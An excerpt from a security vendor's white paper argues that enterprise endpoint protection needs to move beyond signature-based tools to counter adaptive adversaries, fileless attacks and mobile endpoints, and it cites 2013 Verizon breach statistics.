*Excerpt from Solution Spotlight: Next-Generation Endpoint Security. Authored by Rafal Los, Director of Solutions Research, Optiv.
The topic of corporate endpoint security is commonplace in the board rooms of enterprises large and small as the seemingly never-ending arms race with adversaries – whether they are activist, hacktivist or corporate or nation-state sponsored – yields breach after breach. Business leaders look to security executives to define security strategies that are operationally mature while continuing to allow the business to be agile and cost-effective, and to empower their workforce for maximum utility in increasingly hostile environments. As more security executives and professionals push their endpoint strategies into tighter alignment with business objectives, the delicate balance between productivity, cost and security benefit remain a challenge.
Even more frustrating for business executives is that as security spending increases, it never seems to be enough. Executives are continually frustrated that, no matter how much money and how many people they invest in security, they can always be doing more. Adversaries are always a step ahead and a second faster – meaning breaches continue to make headlines in spite of the rise in security budgets. Endpoint security programs, which are key components of a holistic enterprise security strategy, are struggling to adapt to the rapid escalation in adversary activity and to protect the corporate endpoint in a more meaningful and effective way.
Adversaries are Winning
Furthermore, from anecdotal evidence, business leaders are increasingly pushing back against the additive security model – hesitating to add more obstacles to end user productivity while loading down endpoints with yet another agent. As specialized tools are deployed by security for prevention, detection, response and recovery tasks, it is inevitable that endpoints slow down and system overhead increase. Even with the additions of new tools, endpoint systems continue to be compromised because there is a general lack of holistic integration between network, endpoint and various other security tools. Deployed technologies are inadequate and fail to address continually changing threats as adversaries evolve tactics and adapt quickly to static, pattern-based defenses. An evolution in endpoint security coupling actionable threat intelligence with pro-active attack detection is required.
An Evolution on the Endpoints
In the course of engaging with clients on security strategy engagements, the Office of the CISO has discovered that a vast majority of Fortune 1000 clients do not have adequate endpoint protection against even moderately advanced adversaries. Nearly all strategy roadmaps of these clients include a refresh of endpoint security tools with a heavy focus on advanced threats and mitigations. Overall, enterprises are looking to an evolution on the endpoints to provide better tools to decrease the impact of an infiltration or breach, decrease the dwell time of their attackers and improve response and remediation capabilities.
The rise in high profile breaches come as no surprise to enterprise security professionals. As adversaries evolve and adapt, defenses have largely remained static even though more tools are added on a regular basis, especially to the endpoint. Security still depends on signatures and patterns, and continues to focus on malware, which is responsible for a mere 40 percent of all breaches according to the 2013 Verizon Data Breach Investigations Report (DBIR).
The evolving adversary continues to be a problem for signature-based detection tools. Over the last decade these tools have attempted to keep pace with adversaries by writing more signatures faster, and broadening detection capabilities. This approach has created multiple problems. First, an adversary can adapt and evolve their attack patterns faster than tools providers can update signatures. Second, alerts from even a well-tuned detection platform can quickly overwhelm a security team’s ability to respond effectively. Finally, many security tools still focus on networkbased defenses while corporate assets become ever more mobile.
Static indicators as a detection method of malicious activity continue to deliver diminishing results as complex adversaries move beyond malware. To repeat, according to the 2013 Verizon DBIR, only 40 percent of successful breaches were the result of malware. Adversaries are moving from dropping packaged malware as the primary method of attack to directly attacking browsers and operating systems using tools built into the operating system. These tools can include PowerShell or in-memory attacks which fully execute without ever writing to disk, thus traditional detection tools fail silently.
Network detection tools offer scale, but lack the ability to protect the corporate assets as they become increasingly mobile. Relying solely on network-based defenses quickly proves problematic because many modern malware simply wait for the endpoint to leave the safety of the corporate perimeter before performing their tasks. The inability to quickly and effectively share critical security information puts the enterprise security team at a severe disadvantage. A restrictively myopic view makes defending against previously unknown threats extremely inefficient. To compound the situation, hiring and retaining top-level threat analysts continues to pose a challenge for even some of the largest enterprises. The result is a narrow perspective, inefficient use of available tools, and a continued struggle to defend against adversaries that adapt and overcome enterprise defenses.
As part of a holistic, defense-in-depth strategy, the endpoint is a logical defensive control point for organizations that have maturing network controls and still struggle with intrusions.
Read the full Solution Spotlight on Next-Generation Endpoint Security for strategy, prerequisites, and operational guidance on today’s endpoint protection solutions.